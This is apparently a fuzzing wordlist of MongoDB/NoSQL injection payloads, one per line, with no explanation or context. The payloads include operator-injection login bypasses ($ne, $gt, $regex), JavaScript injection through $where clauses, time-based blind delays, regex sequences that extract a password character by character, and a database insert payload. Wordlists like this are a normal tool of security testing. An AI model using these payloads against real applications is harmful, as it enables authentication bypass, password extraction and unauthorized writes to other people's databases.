|| 1==1[$ne]=1
{$gt: ''}
{ $ne: 1 }
{"$gt": ""}
' || 'a'=='a
0;return true
{$nin: [""]}}
';sleep(5000);
';sleep(5000);'
$where: '1 == 1'
';sleep(5000);+'
, $where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
', $or: [ {}, { 'a':'a
true, $where: '1 == 1'
";return(true);var xyz='a
';return 'a'=='a' && ''=='
admin' && this.password%00
username[$ne]=1$password[$ne]=1
username[$ne]=admin&pass[$gt]=s
username[$ne]=admin&pass[$lt]=s
db.injection.insert({success:1});
username[$regex]=.{25}&pass[$ne]=1
username[$eq]=admin&password[$ne]=1
' && this.password.match(/.*/)//+%00
username[$ne]=toto&password[$ne]=toto
username[$regex]=^adm$password[$ne]=1
' && this.passwordzz.match(/.*/)//+%00
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=mdp
username[$regex]=.*&password[$regex]=.*
{"user":{"$gt": ""},"pass":{"$gt": ""}}
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
username[$ne]=toto&password[$regex]=md.*
username[$ne]=toto&password[$regex]=a.{2}
username[$ne]=toto&password[$regex]=b.{2}
username[$ne]=toto&password[$regex]=m.{2}
{ $where: "this.credits == this.debits" }
username[$ne]=toto&password[$regex]=md.{1}
'%20%26%26%20this.password.match(/.*/)//+%00
username[$exists]=true&password[$exists]=true
' } ], $comment:'successful MongoDB injection'
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
admin' && this.password && this.password.match(/.*/)%00
{"username": {"$ne": null}, "password": {"$ne": null} }
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
admin' && this.password && this.password.match(/^a.*$/)%00
admin' && this.password && this.password.match(/^b.*$/)%00
admin' && this.password && this.password.match(/^c.*$/)%00
admin' && this.password && this.password.match(/^duvj.*$/)%00
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
admin' && this.password && this.password.match(/^duvj78i3u$/)%00
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
$or: [ {}, { ‘a’: ‘a’, password: ‘’ }], $comment: ‘successful MongoDB injection’ }
tolkien’, $or: [ {}, { ‘a’:’a&password=’ } ],$comment:’successful MongoDB injection'
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
